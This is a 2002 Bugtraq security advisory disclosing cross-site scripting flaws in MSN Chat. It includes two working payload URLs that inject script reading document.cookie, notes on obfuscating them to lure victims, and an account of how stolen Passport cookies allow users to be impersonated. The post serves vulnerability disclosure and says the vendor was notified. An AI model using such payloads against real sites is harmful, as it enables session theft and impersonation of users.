[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Fun With MSN Chat Part I (Cross Scripting)
From: John Heasman <john.heasman () univ ! ox ! ac ! uk>
Date: 2002-03-29 17:06:49
[Download RAW message or body]
Hi. Seeing as there has been a recent discussion
about cross scripting on high profile sites, I thought it
timely to release details of cross script opportunities
on MSN's chat service.
[Introduction]
MSN Chat is an IRCX network with a web based
client (an ActiveX control). Cross scripting has been
discussed at length elsewhere so I won't describe it
here. MSN have been notified about this advisory.
[Details]
Here are two cross scripting situations. Unicode is
used to pass certain characters; converting the
whole cross script part to unicode further obfuscates
the URL making it easier to trick a user into clicking it.
http://chat.msn.com/chatroom.msnw?rm=%
3Cscript%3Ealert(document.cookie)%3B%3C%
2Fscript%3E
Note: A URL similar to the one above may be
obtained by using the form on
http://chat.msn.com/create.msnw to create a room.
The form provides some basic client-side validation
to check for illegal characters (< and >). This
advisory goes to show the client-side checking has
very little purpose (IMHO).
http://chat.msn.com/invite.msnw?hexUserName=%
3Cscript%3Ealert(document.cookie)%3B%3C%5c%
2Fscript%
3E&hexnick=AAAAA&InvitationCode=123456789&mo
de=2
Note: As this string appears in quotes I have had to
escape the / in script tag.
The implication of the two URLs above is that
passport cookies in the msn.com domain can be
stolen by tricking a user into visiting a malicious
webpage. This can be achieved easily since the
MSN chat control conveniently creates a clickable link
when it detects the string http://.
The first URL has a limit on the number of characters
that can be present in the cross script, since it
represents the name of a chat room the victim
supposedly wishes to join. The chat control will
throw an error about illegal characters in the chat
room name if the page is allowed to load fully (better
to put a window.location="about::"; at the end of the
cross script if you have room). The second URL has
no such limitation.
Let us now discuss the implications for MSN Chat.
The above URLs enable an attacker to impersonate
another user on the chat service and alter his/her
nickname and profile. The three cookies that are of
interest are:
MSPProf (Profile information)
MSPAuth (Authentication information)
MSNChatNN (Nickname)
It is possible for an attacker only to use the victim's
MSNChatNN, thus stealing his nickname, but not his
identity as such. Some chat room operators use non-
MSN clients to allow use of more advanced IRCX
commands e.g. ACCESS command to auto-host
depending on nickname/identity etc. Obviously this is
not a good idea in light of this bug.
[About Cross Scripting in general]
I would agree with earlier postings about the extent of
cross scripting vulnerabilities. I visited a number of
UK retailer's websites and I would say that 80 - 90%
were vulnerable to cross scripting. I was (am?)
planning to release a list or attempt to contact site
admins to inform them. This got me thinking about
automating detection of cross scripting
vulnerabilities - at the basic level, scanning a page for
any forms, returning the form with some arbitrary
input then scanning the returned page for that same
input. Of course this is largely simplified but it is an
interesting idea. If anyone is interested in discussing
this, please get in contact.
[The Obligatory Greetings]
.ox ppl I know & the boyz@103 :)
Thanks
John
-------------------------------------------
john.heasman@univ.ox.ac.uk
-------------------------------------------
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic